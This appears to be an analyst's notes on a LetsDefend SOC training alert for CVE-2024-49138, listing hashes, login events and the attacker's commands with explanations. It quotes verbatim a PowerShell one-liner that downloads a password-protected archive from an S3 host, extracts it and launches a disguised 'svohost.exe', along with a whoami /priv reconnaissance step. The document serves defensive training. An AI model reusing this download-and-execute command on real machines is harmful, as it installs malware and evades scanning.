File Hash: b432dcf4a0f0b601b1d79848467137a5e25cab5a0b7b1224be9d3b6540122db9
CVE: cve-2024-49138
File Hash 2: 6335b893875cc9e61cf499cfc6ab06c17caf11e8a806d2f0358f7f35c9beacd5
Host: 172.16.17.207 (Victor)

command line execution (captured verbatim):
```
$url = 'https://files-ld.s3.us-east-2.amazonaws.com/service-installer.zip'; $dest = 'C:\temp\service-installer.zip'; $extractPath = 'C:\temp'; $password = 'infected'; if (-not (Test-Path -Path $extractPath)) { New-Item -ItemType Directory -Path $extractPath -Force | Out-Null }; Invoke-WebRequest -Uri $url -OutFile $dest; $7zipPath = 'C:\Program Files\7-Zip\7z.exe'; Start-Process -FilePath $7zipPath -ArgumentList "x -p$password -o$extractPath $dest" -NoNewWindow -Wait -PassThru; Remove-Item -Path $dest; Start-Process -FilePath "$extractPath\service_installer\svohost.exe"
```
What the one-liner does: downloads a password-protected archive from the S3 bucket above into C:\temp, extracts it with the locally installed 7-Zip using the password `infected` (the password stops the archive from being inspected in transit or by a scanner), deletes the archive to remove the evidence, and then launches `C:\temp\service_installer\svohost.exe`. The binary name is one character off from `svchost.exe` and it runs from a user-writable directory rather than System32, both signs of a masquerading payload.

attempted privilege escalation:
```
"C:\Windows\system32\whoami.exe" /priv
```
`whoami /priv` itself only enumerates the privileges held by the current token; it is the reconnaissance step that precedes an escalation attempt, not the escalation.

Log Management:
source_address 185.107.56.141 makes 5 connections, then starts trying to log in as admin, fails twice, and within a minute succeeds in logging in as Victor (Jan 22, 2:35 pm)
EventID 4624: an account was successfully logged on (remote logon as Victor)
EventID 4625: an account failed to log on (guest)
No indication that the malware was quarantined

I couldn't find a sample of the malware to verify the C2 address dynamically, but checking endpoint security and log management shows that the malware was downloaded from an AWS file-hosting site. The community walkthrough posted by LetsDefend doesn't show how to find the C2 server either.